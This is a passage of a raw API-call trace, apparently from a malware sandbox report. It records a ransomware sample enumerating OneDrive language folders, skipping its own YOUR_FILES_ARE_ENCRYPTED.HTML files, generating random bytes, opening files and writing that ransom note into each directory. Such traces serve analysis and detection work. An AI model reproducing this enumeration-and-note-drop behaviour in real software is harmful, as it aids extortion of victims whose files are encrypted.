hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa58278f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa58278f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.873] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.873] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\lb-lu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.873] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.876] CloseHandle (hObject=0x5b8) returned 1 [0161.876] GetProcessHeap () returned 0x270000 [0161.877] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.877] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4353870, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4353870, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4353870, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1aca8, dwReserved0=0x0, dwReserved1=0x60, cFileName="LoggingPlatform.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0161.877] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\LoggingPlatform.dll") returned 91 [0161.877] lstrcmpW (lpString1="LoggingPlatform.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.877] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0161.877] lstrlenW (lpString=".dll") returned 4 [0161.877] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0161.877] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0161.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\LoggingPlatform.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\loggingplatform.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0161.877] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lt", cAlternateFileName="")) returned 1 [0161.877] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt") returned 74 [0161.877] GetProcessHeap () returned 0x270000 [0161.877] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.877] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt" [0161.877] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\*" [0161.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.878] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa58278f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="..", cAlternateFileName="")) returned 1 [0161.878] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.878] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.878] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.878] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.878] lstrlenW (lpString=".mui") returned 4 [0161.878] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.878] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5bb99f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5bb99f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.878] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.878] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.879] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.881] CloseHandle (hObject=0x5b8) returned 1 [0161.882] GetProcessHeap () returned 0x270000 [0161.883] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.883] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5d367b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lv", cAlternateFileName="")) returned 1 [0161.883] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv") returned 74 [0161.883] GetProcessHeap () returned 0x270000 [0161.883] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.883] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv" [0161.883] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\*" [0161.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5d367b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.883] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5bb99f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5d367b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.883] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5d367b0, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5da8bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.883] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.883] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.883] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.884] lstrlenW (lpString=".mui") returned 4 [0161.884] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.884] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5d367b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5d367b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5da8bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.884] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.884] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.884] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.887] CloseHandle (hObject=0x5b8) returned 1 [0161.887] GetProcessHeap () returned 0x270000 [0161.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.888] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5da8bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mi-nz", cAlternateFileName="")) returned 1 [0161.888] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz") returned 77 [0161.888] GetProcessHeap () returned 0x270000 [0161.888] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.888] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz" [0161.888] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\*" [0161.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5da8bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.889] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5da8bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.889] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 
[0161.889] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.889] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.889] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.889] lstrlenW (lpString=".mui") returned 4 [0161.889] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.889] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5f97db0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5f97db0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.889] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.889] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mi-nz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mi-nz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.890] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.892] CloseHandle (hObject=0x5b8) returned 1 [0161.893] GetProcessHeap () returned 0x270000 [0161.893] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.894] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mk", cAlternateFileName="")) returned 1 [0161.894] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk") returned 74 [0161.894] GetProcessHeap () returned 0x270000 [0161.894] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.894] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk" [0161.894] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\*" [0161.894] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.894] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa5f97db0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.895] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.895] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.895] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
